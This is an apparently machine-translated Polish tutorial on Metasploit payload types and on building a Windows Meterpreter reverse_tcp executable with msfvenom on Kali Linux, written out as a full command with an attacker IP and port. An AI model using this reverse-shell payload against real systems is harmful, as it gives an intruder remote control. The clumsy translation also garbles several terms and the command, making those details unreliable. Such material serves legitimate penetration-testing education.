Metasploit to jedna z najczęściej używanych platform do przeprowadzania testów penetracji, hakowania, a nawet nieformalnych gier. Musimy zrozumieć, w jaki sposób komponenty i ładunki funkcjonują, aby je skutecznie wykorzystać. Mówiąc o uproszczeniu, ładunek to działanie, które należy wykonać, gdy exploit zakończy jego wykonanie. Ładunek jest częścią kodu, który exploit wykonuje. Exploits służą do uzyskania dostępu do systemu, a ładunki wykonują określone zadania. Metasploit ma wiele ładunków, takich jak powtórne powłoki, powłoki, miernik i inne. Kilka ładunków będzie działać z najwięcej exploitów; Jednak znalezienie odpowiedniego ładunku, które będzie działać wraz z exploit, wymaga dochodzenia. Po zdecydowaniu na exploit, użyj polecenia „Wyświetlanie” Metasploit, aby uzyskać listę ładunków, które będą z nim działać.
Rodzaje ładunków
W Metasploit istnieje kilka różnych rodzajów ładunków. Te trzy podstawowe typy to te, które ostatecznie skończysz, używając najbardziej:
Syngiel
Single są bardzo małe i mają na celu zainicjowanie rozmowy przed przejściem na inny etap.
Stagers
Ładunek używa stolarza do ustalenia połączenia sieciowego między systemem docelowym a procesorem ładunku Metasploit Server. Stager umożliwia ładowanie i wstawienie większego, bardziej skomplikowanego ładunku nazywanego sceną za pomocą mniejszego ładunku.
Miernik
Miernik stał się ładunkiem ataku metasploit, który daje współczynnik intruza, który wpływa na sposób przeglądania i wykonania kodu na komputerze docelowym. MeterPreter to aplikacja tylko do pamięci, która nie pisze na dysku. MeterPreter próbował wstrzyknąć się w zaatakowany proces, skąd może przenieść się do innych procesów operacyjnych; Dlatego nie są generowane żadne nowe procesy. MeterPreter został utworzony, aby uniknąć wad korzystania z wyspecjalizowanych ładunków, jednocześnie umożliwiając pisanie poleceń i zapewnienie zaszyfrowanej komunikacji. Minusem stosowania określonych ładunków jest to, że alarmy mogą być podniesione, jeśli nowszy proces rozpocznie się w całym systemie docelowym.
Tworzenie ładunku z Metasploit w Kali Linux
Aby utworzyć ładunek za pomocą Metasploit w Kali Linux, postępuj zgodnie z poniższymi krokami:
Krok 1: Dostęp do msfconsole
Msfconsole jest jedynym sposobem na dostęp do większości funkcji Metasploit. MSFCONSOLE zapewnia platformie interfejs oparty na konsoli. MSFCONSOLE to interfejs MSF z największymi funkcjami i jest najbardziej stabilny. Pełna funkcja linii odczytu, tabbing i zakończenie poleceń są dostarczane przez msfconsole. Polecenia zewnętrzne można uruchomić z msfconsole. Użyj poniższej podanej komendy, aby uzyskać dostęp do msfconsole na Kali Linux.
$ msfconsole
Krok 2: Dostęp do MSFvenom
Ładunek, który wykonujemy za pomocą MSFVENOM, będzie odwrotną ładunkiem TCP. Ten ładunek tworzy wykonywalny, który po uruchomieniu ustanawia połączenie między komputerem użytkownika a naszym obsługą metasploit, co pozwala nam przeprowadzić sesję miernika. Użyj poniższego podanego polecenia, aby uzyskać dostęp do MSFvenom na Kali Linux.
$ msfvenom -p
Krok 3: Tworzenie ładunku
Użyj poniższej podanej komendy, aby utworzyć ładunek w metasploit na Kali Linux.
$ msfvenom -p Windows/MeterPreter/reverse_tcp lhost = 192.168.43.28 lport = 6001 -F exe -o.exe
Możesz użyć opcji -p, aby wskazać, który ładunek chcesz użyć. LHOST wydaje się być adresem IP atakującego, do którego chcesz łączyć ładunek. Lort jest taki sam jak powyżej; Jest to port, do którego łączy ładunek, i musi być skonfigurowany w obsłudze. -F Instruuje msfvenom, jak wygenerować ładunek; W takim przypadku wybieramy program wykonywalny lub exe. Ładunek utworzony przez powyższe wykonanie polecenia wynosi 73802 bajtów, jak pokazano z wyżej wymienionego obrazu.
Aby sprawdzić, gdzie został utworzony, będziemy nawigować w kierunku katalogu domowego. Na podstawie zrzutu ekranu poniżej, możesz sprawdzić ten ładunek.exe został pomyślnie stworzony.
Możesz sprawdzić jego właściwości, klikając go dwukrotnie. Rozmiar utworzonego ładunku jest taki sam, jak na ekranie terminalu.
Wniosek
W tym artykule przedstawiono krótkie wprowadzenie związane z ładunkami i ich typami. Postępowaliśmy krok po kroku, aby tworzyć ładunki w metasploit w systemie operacyjnym Kali Linux.